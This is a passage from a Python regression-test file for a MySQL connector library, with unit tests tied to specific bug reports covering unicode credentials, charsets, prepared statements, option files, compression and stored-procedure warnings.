self.assertEqual(self.cur.fetchall(), data)
def tearDown(self):
self.cur.execute(u"DROP TABLE IF EXISTS {0}".format(self.table))
self.cur.close()
self.cnx.close()
class BugOra14843456(tests.MySQLConnectorTests):
"""BUG#14843456: UNICODE USERNAME AND/OR PASSWORD FAILS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
if config['unix_socket'] and os.name != 'nt':
self.host = 'localhost'
else:
self.host = config['host']
grant = u"CREATE USER '{user}'@'{host}' IDENTIFIED BY '{password}'"
self._credentials = [
(u'Herne', u'Herne'),
(u'\u0141owicz', u'\u0141owicz'),
]
for user, password in self._credentials:
self.cursor.execute(grant.format(
user=user, host=self.host, password=password))
def tearDown(self):
for user, password in self._credentials:
self.cursor.execute(u"DROP USER '{user}'@'{host}'".format(
user=user, host=self.host))
def test_unicode_credentials(self):
config = tests.get_mysql_config()
for user, password in self._credentials:
config['user'] = user
config['password'] = password
config['database'] = None
try:
cnx = connection.MySQLConnection(**config)
except (UnicodeDecodeError, errors.InterfaceError):
self.fail('Failed using unicode username or password')
else:
cnx.close()
class Bug499410(tests.MySQLConnectorTests):
"""lp:499410 Disabling unicode does not work"""
def test_use_unicode(self):
config = tests.get_mysql_config()
config['use_unicode'] = False
cnx = connection.MySQLConnection(**config)
self.assertEqual(False, cnx._use_unicode)
cnx.close()
@cnx_config(use_unicode=False, charset='greek')
@foreach_cnx()
def test_charset(self):
charset = 'greek'
cur = self.cnx.cursor()
data = [b'\xe1\xed\xf4\xdf\xef'] # Bye in Greek
exp_unicode = [(u'\u03b1\u03bd\u03c4\u03af\u03bf',), ]
exp_nonunicode = [(data[0],)]
tbl = '{0}test'.format(charset)
try:
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.execute(
"CREATE TABLE {0} (c1 VARCHAR(60)) charset={1}".format(
tbl, charset))
except:
self.fail("Failed creating test table.")
stmt = u'INSERT INTO {0} VALUES (%s)'.format(tbl)
try:
for line in data:
cur.execute(stmt, (line,))
except Exception as exc:
self.fail("Failed populating test table: {0}".format(str(exc)))
cur.execute("SELECT * FROM {0}".format(tbl))
res_nonunicode = cur.fetchall()
self.cnx.set_unicode(True)
cur.execute("SELECT * FROM {0}".format(tbl))
res_unicode = cur.fetchall()
try:
cur.execute('DROP TABLE IF EXISTS {0}'.format(tbl))
except:
self.fail("Failed cleaning up test table.")
self.assertEqual(exp_nonunicode, res_nonunicode)
self.assertEqual(exp_unicode, res_unicode)
class BugOra18742429(tests.MySQLConnectorTests):
"""BUG#18742429: CPY FAILS WHEN QUERYING LARGE NUMBER OF COLUMNS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'Bug18742429'
cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.tbl)
create = 'CREATE TABLE {0}({1})'.format(self.tbl, ','.join(
['col'+str(i)+' INT(10)' for i in range(1000)]))
cnx.cmd_query(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx(connection.MySQLConnection)
def test_columns(self):
cur = self.cnx.cursor()
cur.execute('TRUNCATE TABLE {0}'.format(self.tbl))
stmt = "INSERT INTO {0} VALUES({1})".format(self.tbl, ','.join(
[str(i) if i%2==0 else 'NULL' for i in range(1000)]
))
exp = tuple(i if i%2==0 else None for i in range(1000))
cur.execute(stmt)
cur = self.cnx.cursor(prepared=True)
stmt = 'SELECT * FROM {0} WHERE col0=?'.format(self.tbl)
cur.execute(stmt, (0,))
self.assertEqual(exp, cur.fetchone())
class BugOra19164627(tests.MySQLConnectorTests):
"""BUG#19164627: Cursor tries to decode LINESTRING data as utf-8
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'BugOra19164627'
cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.tbl)
cnx.cmd_query("CREATE TABLE {0} ( "
"id SERIAL PRIMARY KEY AUTO_INCREMENT NOT NULL, "
"line LINESTRING NOT NULL "
") DEFAULT CHARSET=ascii".format(self.tbl))
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_linestring(self):
cur = self.cnx.cursor()
cur.execute('TRUNCATE TABLE {0}'.format(self.tbl))
cur.execute('INSERT IGNORE INTO {0} (id, line) '
'VALUES (0,LINESTRING(POINT(0, 0), POINT(0, 1)))'.format(
self.tbl
))
cur.execute("SELECT * FROM {0} LIMIT 1".format(self.tbl))
self.assertEqual(cur.fetchone(), (1, b'\x00\x00\x00\x00\x01\x02\x00\x00'
b'\x00\x02\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\xf0?', ))
cur.close()
class BugOra19225481(tests.MySQLConnectorTests):
"""BUG#19225481: FLOATING POINT INACCURACY WITH PYTHON v2
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'Bug19225481'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = 'CREATE TABLE {0} (col1 DOUBLE)'.format(self.tbl)
cnx.cmd_query(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_columns(self):
self.cnx.cmd_query("TRUNCATE {0}".format(self.tbl))
cur = self.cnx.cursor()
values = [
(123.123456789987,),
(234.234,),
(12.12,),
(111.331,),
(0.0,),
(-99.99999900099,)
]
stmt = "INSERT INTO {0} VALUES(%s)".format(self.tbl)
cur.executemany(stmt, values)
stmt = "SELECT * FROM {0}".format(self.tbl)
cur.execute(stmt)
self.assertEqual(values, cur.fetchall())
class BugOra19169990(tests.MySQLConnectorTests):
"""BUG#19169990: Issue with compressed cnx using Python 2
"""
@cnx_config(compress=True)
@foreach_cnx()
def test_compress(self):
for charset in ('utf8', 'latin1', 'latin7'):
self.config['charset'] = charset
try:
self.cnx = self.cnx.__class__(**self.config)
cur = self.cnx.cursor()
cur.execute("SELECT %s", ('mysql'*10000,))
except TypeError:
traceback.print_exc()
self.fail("Failed setting up compressed cnx using {0}".format(
charset
))
except errors.Error:
self.fail("Failed sending/retrieving compressed data")
self.cnx.close()
class BugOra19184025(tests.MySQLConnectorTests):
"""BUG#19184025: FIRST NULL IN ROW RETURNS REST OF ROW AS NONE
"""
def setUp(self):
self.tbl = 'Bug19184025'
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = "CREATE TABLE {0} (c1 INT, c2 INT NOT NULL DEFAULT 2)".format(
self.tbl
)
cnx.cmd_query(create)
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_row_to_python(self):
self.cnx.cmd_query("TRUNCATE {0}".format(self.tbl))
cur = self.cnx.cursor()
cur.execute("INSERT INTO {0} (c1) VALUES (NULL)".format(self.tbl))
cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((None, 2), cur.fetchone())
cur.close()
class BugOra19170287(tests.MySQLConnectorTests):
"""BUG#19170287: DUPLICATE OPTION_GROUPS RAISING ERROR WITH PYTHON 3
"""
def test_duplicate_groups(self):
option_file_dir = os.path.join('tests', 'data', 'option_files')
opt_file = os.path.join(option_file_dir, 'dup_groups.cnf')
exp = {
u'password': u'mypass',
u'user': u'mysql',
u'database': u'duplicate_data',
u'port': 10000
}
self.assertEqual(exp, read_option_files(option_files=opt_file))
class BugOra19169143(tests.MySQLConnectorTests):
"""BUG#19169143: FAILURE IN RAISING ERROR WITH DUPLICATE OPTION_FILES
"""
def test_duplicate_optionfiles(self):
option_file_dir = os.path.join('tests', 'data', 'option_files')
files = [
os.path.join(option_file_dir, 'include_files', '1.cnf'),
os.path.join(option_file_dir, 'include_files', '2.cnf'),
os.path.join(option_file_dir, 'include_files', '1.cnf'),
]
self.assertRaises(ValueError, mysql.connector.connect,
option_files=files)
class BugOra19282158(tests.MySQLConnectorTests):
"""BUG#19282158: NULL values with prepared statements
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
self.tbl = 'Bug19282158'
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ('CREATE TABLE {0}(col1 INT NOT NULL, col2 INT NULL, '
'col3 VARCHAR(10), col4 DECIMAL(4,2) NULL, '
'col5 DATETIME NULL, col6 INT NOT NULL, col7 VARCHAR(10), '
'PRIMARY KEY(col1))'.format(self.tbl))
self.cursor.execute(create)
def tearDown(self):
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
self.cursor.close()
self.cnx.close()
def test_null(self):
cur = self.cnx.cursor(prepared=True)
sql = ("INSERT INTO {0}(col1, col2, col3, col4, col5, col6, col7) "
"VALUES (?, ?, ?, ?, ?, ?, ?)".format(self.tbl))
params = (100, None, 'foo', None, datetime(2014, 8, 4, 9, 11, 14),
10, 'bar')
exp = (100, None, 'foo', None,
datetime(2014, 8, 4, 9, 11, 14), 10, 'bar')
cur.execute(sql, params)
sql = "SELECT * FROM {0}".format(self.tbl)
cur.execute(sql)
self.assertEqual(exp, cur.fetchone())
cur.close()
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra19168737(tests.MySQLConnectorTests):
"""BUG#19168737: UNSUPPORTED CONNECTION ARGUMENTS WHILE USING OPTION_FILES
"""
def test_unsupported_arguments(self):
option_file_dir = os.path.join('tests', 'data', 'option_files')
opt_file = os.path.join(option_file_dir, 'pool.cnf')
config = tests.get_mysql_config()
if tests.MYSQL_VERSION < (5, 7):
config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
conn = mysql.connector.connect(option_files=opt_file,
option_groups=['pooling'], **config)
self.assertEqual('my_pool', conn.pool_name)
mysql.connector._CONNECTION_POOLS = {}
conn.close()
new_config = read_option_files(option_files=opt_file,
option_groups=['failover'], **config)
exp = {
'failover': ({'pool_name': 'failA', 'port': 3306},
{'pool_name': 'failB', 'port': 3307})
}
exp.update(config)
self.assertEqual(exp, new_config)
class BugOra21530100(tests.MySQLConnectorTests):
"""BUG#21530100: CONNECT FAILS WHEN USING MULTIPLE OPTION_GROUPS WITH
PYTHON 3.3
"""
def test_option_files_with_option_groups(self):
temp_cnf_file = os.path.join(os.getcwd(), 'temp.cnf')
temp_include_file = os.path.join(os.getcwd(), 'include.cnf')
try:
cnf_file = open(temp_cnf_file, "w+")
include_file = open(temp_include_file, "w+")
config = tests.get_mysql_config()
cnf = "[group32]\n"
cnf += '\n'.join(['{0} = {1}'.format(key, value)
for key, value in config.items()])
cnf += "\n[group31]\n"
cnf += "!include {0}\n".format(temp_include_file)
include_cnf = "[group41]\n"
include_cnf += "charset=utf8\n"
cnf_file.write(cnf)
include_file.write(include_cnf)
cnf_file.close()
include_file.close()
conn = mysql.connector.connect(option_files=temp_cnf_file,
option_groups=['group31','group32','group41'])
except Exception as exc:
self.fail("Connection failed with option_files argument: {0}"
"".format(exc))
finally:
os.remove(temp_cnf_file)
os.remove(temp_include_file)
class BugOra19481761(tests.MySQLConnectorTests):
"""BUG#19481761: OPTION_FILES + !INCLUDE FAILS WITH TRAILING NEWLINE
"""
def test_option_files_with_include(self):
temp_cnf_file = os.path.join(os.getcwd(), 'temp.cnf')
temp_include_file = os.path.join(os.getcwd(), 'include.cnf')
cnf_file = open(temp_cnf_file, "w+")
include_file = open(temp_include_file, "w+")
config = tests.get_mysql_config()
cnf = "[connector_python]\n"
cnf += '\n'.join(['{0} = {1}'.format(key, value)
for key, value in config.items()])
include_file.write(cnf)
cnf_file.write("!include {0}\n".format(temp_include_file))
cnf_file.close()
include_file.close()
try:
conn = mysql.connector.connect(option_files=temp_cnf_file)
except:
self.fail("Connection failed with option_files argument.")
self.assertEqual(config, read_option_files(option_files=temp_cnf_file))
os.remove(temp_cnf_file)
os.remove(temp_include_file)
class BugOra19584051(tests.MySQLConnectorTests):
"""BUG#19584051: TYPE_CODE DOES NOT COMPARE EQUAL
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
self.tbl = 'Bug19584051'
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ('CREATE TABLE {0}(col1 INT NOT NULL, col2 BLOB, '
'col3 VARCHAR(10), col4 DECIMAL(4,2), '
'col5 DATETIME , col6 YEAR, '
'PRIMARY KEY(col1))'.format(self.tbl))
self.cursor.execute(create)
def tearDown(self):
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
self.cursor.close()
self.cnx.close()
def test_dbapi(self):
cur = self.cnx.cursor()
sql = ("INSERT INTO {0}(col1, col2, col3, col4, col5, col6) "
"VALUES (%s, %s, %s, %s, %s, %s)".format(self.tbl))
params = (100, 'blob-data', 'foo', 1.2, datetime(2014, 8, 4, 9, 11, 14),
2014)
exp = [
mysql.connector.NUMBER,
mysql.connector.BINARY,
mysql.connector.STRING,
mysql.connector.NUMBER,
mysql.connector.DATETIME,
mysql.connector.NUMBER,
]
cur.execute(sql, params)
sql = "SELECT * FROM {0}".format(self.tbl)
cur.execute(sql)
temp = cur.fetchone()
type_codes = [row[1] for row in cur.description]
self.assertEqual(exp, type_codes)
cur.close()
class BugOra19522948(tests.MySQLConnectorTests):
"""BUG#19522948: DATA CORRUPTION WITH TEXT FIELDS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.tbl = 'Bug19522948'
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = "CREATE TABLE {0} (c1 LONGTEXT NOT NULL)".format(
self.tbl
)
self.cur.execute(create)
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
self.cnx.close()
def test_row_to_python(self):
cur = self.cnx.cursor(prepared=True)
data = "test_data"*10
cur.execute("INSERT INTO {0} (c1) VALUES (?)".format(self.tbl), (data,))
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((data,), self.cur.fetchone())
self.cur.execute("TRUNCATE TABLE {0}".format(self.tbl))
data = "test_data"*1000
cur.execute("INSERT INTO {0} (c1) VALUES (?)".format(self.tbl), (data,))
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((data,), self.cur.fetchone())
self.cur.execute("TRUNCATE TABLE {0}".format(self.tbl))
data = "test_data"*10000
cur.execute("INSERT INTO {0} (c1) VALUES (?)".format(self.tbl), (data,))
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((data,), self.cur.fetchone())
class BugOra19500097(tests.MySQLConnectorTests):
"""BUG#19500097: BETTER SUPPORT FOR RAW/BINARY DATA
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug19500097'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (col1 VARCHAR(10), col2 INT) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_binary_charset(self):
sql = "INSERT INTO {0} VALUES(%s, %s)".format(self.tbl)
cur = self.cnx.cursor()
cur.execute(sql, ('foo', 1))
cur.execute(sql, ('ëëë', 2))
cur.execute(sql, (u'ááá', 5))
self.cnx.set_charset_collation('binary')
cur.execute(sql, ('bar', 3))
cur.execute(sql, ('ëëë', 4))
cur.execute(sql, (u'ááá', 6))
exp = [
(bytearray(b'foo'), 1),
(bytearray(b'\xeb\xeb\xeb'), 2),
(bytearray(b'\xe1\xe1\xe1'), 5),
(bytearray(b'bar'), 3),
(bytearray(b'\xc3\xab\xc3\xab\xc3\xab'), 4),
(bytearray(b'\xc3\xa1\xc3\xa1\xc3\xa1'), 6)
]
cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual(exp, cur.fetchall())
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 3),
"MySQL {0} does not support COM_RESET_CONNECTION".format(
tests.MYSQL_VERSION_TXT))
class BugOra19549363(tests.MySQLConnectorTests):
"""BUG#19549363: Compression does not work with Change User
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.config['compress'] = True
mysql.connector._CONNECTION_POOLS = {}
self.config['pool_name'] = 'mypool'
self.config['pool_size'] = 3
self.config['pool_reset_session'] = True
def tearDown(self):
# Remove pools created by test
mysql.connector._CONNECTION_POOLS = {}
def test_compress_reset_connection(self):
self.config['use_pure'] = True
cnx1 = mysql.connector.connect(**self.config)
try:
cnx1.close()
except:
self.fail("Reset session with compression test failed.")
finally:
mysql.connector._CONNECTION_POOLS = {}
@unittest.skipIf(CMySQLConnection is None, ERR_NO_CEXT)
def test_compress_reset_connection_cext(self):
self.config['use_pure'] = False
cnx1 = mysql.connector.connect(**self.config)
try:
cnx1.close()
except:
self.fail("Reset session with compression test failed.")
finally:
mysql.connector._CONNECTION_POOLS = {}
class BugOra19803702(tests.MySQLConnectorTests):
"""BUG#19803702: CAN'T REPORT ERRORS THAT HAVE NON-ASCII CHARACTERS
"""
def test_errors(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.tbl = 'áááëëëááá'
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (col1 VARCHAR(10), col2 INT) "
"DEFAULT CHARSET latin1".format(self.tbl))
self.cur.execute(create)
self.assertRaises(errors.DatabaseError, self.cur.execute, create)
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
self.cnx.close()
class BugOra19777815(tests.MySQLConnectorTests):
"""BUG#19777815: CALLPROC() DOES NOT SUPPORT WARNINGS
"""
def setUp(self):
config = tests.get_mysql_config()
config['get_warnings'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.sp1 = 'BUG19777815'
self.sp2 = 'BUG19777815_with_result'
create1 = (
"CREATE PROCEDURE {0}() BEGIN SIGNAL SQLSTATE '01000' "
"SET MESSAGE_TEXT = 'TEST WARNING'; END;".format(self.sp1)
)
create2 = (
"CREATE PROCEDURE {0}() BEGIN SELECT 1; SIGNAL SQLSTATE '01000' "
"SET MESSAGE_TEXT = 'TEST WARNING'; END;".format(self.sp2)
)
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp1))
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp2))
cur.execute(create1)
cur.execute(create2)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp1))
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp2))
cur.close()
cnx.close()
@foreach_cnx(get_warnings=True)
def test_warning(self):
cur = self.cnx.cursor()
cur.callproc(self.sp1)
exp = [(u'Warning', 1642, u'TEST WARNING')]
self.assertEqual(exp, cur.fetchwarnings())
@foreach_cnx(get_warnings=True)
def test_warning_with_rows(self):
cur = self.cnx.cursor()
cur.callproc(self.sp2)
exp = [(1,)]
if PY2:
self.assertEqual(exp, cur.stored_results().next().fetchall())
else:
self.assertEqual(exp, next(cur.stored_results()).fetchall())
exp = [(u'Warning', 1642, u'TEST WARNING')]
self.assertEqual(exp, cur.fetchwarnings())
class BugOra20407036(tests.MySQLConnectorTests):
"""BUG#20407036: INCORRECT ARGUMENTS TO MYSQLD_STMT_EXECUTE ERROR
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.tbl = 'Bug20407036'
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} ( id int(10) unsigned NOT NULL, "
"text VARCHAR(70000) CHARACTER SET utf8 NOT NULL, "
"rooms tinyint(3) unsigned NOT NULL) "
"ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 "
"COLLATE=utf8_unicode_ci".format(self.tbl))
self.cur.execute(create)
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
self.cnx.close()
def test_binary_charset(self):
cur = self.cnx.cursor(prepared=True)
sql = "INSERT INTO {0}(text, rooms) VALUES(%s, %s)".format(self.tbl)
cur.execute(sql, ('a'*252, 1))
cur.execute(sql, ('a'*253, 2))
cur.execute(sql, ('a'*255, 3))
cur.execute(sql, ('a'*251, 4))
cur.execute(sql, ('a'*65535, 5))
exp = [
(0, 'a'*252, 1),
(0, 'a'*253, 2),
(0, 'a'*255, 3),
(0, 'a'*251, 4),
(0, 'a'*65535, 5),
]
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual(exp, self.cur.fetchall())
class BugOra20301989(tests.MySQLConnectorTests):
"""BUG#20301989: SET DATA TYPE NOT TRANSLATED CORRECTLY WHEN EMPTY
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug20301989'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (col1 SET('val1', 'val2')) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s)".format(self.tbl)
cur.execute(sql, ('val1,val2',))
cur.execute(sql, ('val1',))
cur.execute(sql, ('',))
cur.execute(sql, (None,))
exp = [
(set([u'val1', u'val2']),),
(set([u'val1']),),
(set([]),),
(None,)
]
cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual(exp, cur.fetchall())
class BugOra20462427(tests.MySQLConnectorTests):
"""BUG#20462427: BYTEARRAY INDEX OUT OF RANGE
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'BugOra20462427'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} ("
"id INT PRIMARY KEY, "
"a LONGTEXT "
") ENGINE=Innodb DEFAULT CHARSET utf8".format(self.tbl))
cur.execute(create)
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
def _test_bigdata(self):
temp = 'a'*16777210
insert = "INSERT INTO {0} (a) VALUES ('{1}')".format(self.tbl, temp)
cur = self.cnx.cursor()
cur.execute(insert)
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777210, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'a')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777211, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'a')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777212, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'a')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777213, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'aaa')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777216, len(res[0][0]))
cur.close()
@cnx_config(compress=False, connection_timeout=100)
@foreach_cnx()
def test_bigdata_compress(self):
self._test_bigdata()
@cnx_config(connection_timeout=100)
@foreach_cnx()
def test_bigdata_nocompress(self):
self._test_bigdata()
class BugOra20811802(tests.MySQLConnectorTests):
"""BUG#20811802: ISSUES WHILE USING BUFFERED=TRUE OPTION WITH CPY CEXT
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug20811802'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (id INT, name VARCHAR(5), dept VARCHAR(5)) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s, %s, %s)".format(self.tbl)
data = [
(1, 'abc', 'cs'),
(2, 'def', 'is'),
(3, 'ghi', 'cs'),
(4, 'jkl', 'it'),
]
cur.executemany(sql, data)
cur.close()
cur = self.cnx.cursor(named_tuple=True, buffered=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual((row.id, row.name, row.dept), data[i])
i += 1
cur.close()
cur = self.cnx.cursor(dictionary=True, buffered=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual(row, dict(zip(('id', 'name', 'dept'), data[i])))
i += 1
cur = self.cnx.cursor(named_tuple=True, buffered=False)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual((row.id, row.name, row.dept), data[i])
i += 1
cur.close()
cur = self.cnx.cursor(dictionary=True, buffered=False)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual(row, dict(zip(('id', 'name', 'dept'), data[i])))
i += 1
class BugOra20834643(tests.MySQLConnectorTests):
"""BUG#20834643: ATTRIBUTE ERROR NOTICED WHILE TRYING TO PROMOTE SERVERS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug20834643'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (id INT, name VARCHAR(5), dept VARCHAR(5)) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s, %s, %s)".format(self.tbl)
data = [
(1, 'abc', 'cs'),
(2, 'def', 'is'),
(3, 'ghi', 'cs'),
(4, 'jkl', 'it'),
]
cur.executemany(sql, data)
cur.close()
cur = self.cnx.cursor(named_tuple=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchone()
self.assertEqual(data[0], (res.id, res.name, res.dept))
res = cur.fetchall()
exp = []
for row in res:
exp.append((row.id, row.name, row.dept))
self.assertEqual(exp, data[1:])
cur.close()
cur = self.cnx.cursor(named_tuple=True, buffered=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchone()
self.assertEqual(data[0], (res.id, res.name, res.dept))
res = cur.fetchall()
exp = []
for row in res:
exp.append((row.id, row.name, row.dept))
self.assertEqual(exp, data[1:])
cur.close()
cur = self.cnx.cursor(named_tuple=True, buffered=False)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchone()
self.assertEqual(data[0], (res.id, res.name, res.dept))
res = cur.fetchall()
exp = []
for row in res:
exp.append((row.id, row.name, row.dept))
self.assertEqual(exp, data[1:])
cur.close()
class BugOra20653441(tests.MySQLConnectorTests):
"""BUG#20653441: PYTHON CONNECTOR HANGS IF A QUERY IS KILLED (ERROR 1317)"""
def setUp(self):
self.table_name = 'Bug20653441'
self._setup()
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.table_name))
table = (
"CREATE TABLE {table} ("
" id INT UNSIGNED NOT NULL AUTO_INCREMENT,"
" c1 VARCHAR(255) DEFAULT '{default}',"
" PRIMARY KEY (id)"
")"
).format(table=self.table_name, default='a' * 255)
cnx.cmd_query(table)
stmt = "INSERT INTO {table} (id) VALUES {values}".format(
table=self.table_name,
values=','.join(['(NULL)'] * 1024)
)
cnx.cmd_query(stmt)
cnx.commit()
cnx.close()
def tearDown(self):
try:
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query(
"DROP TABLE IF EXISTS {0}".format(self.table_name))
cnx.close()
except:
pass
@foreach_cnx()
def test_kill_query(self):
def kill(connection_id):
"""Kill query using separate connection"""
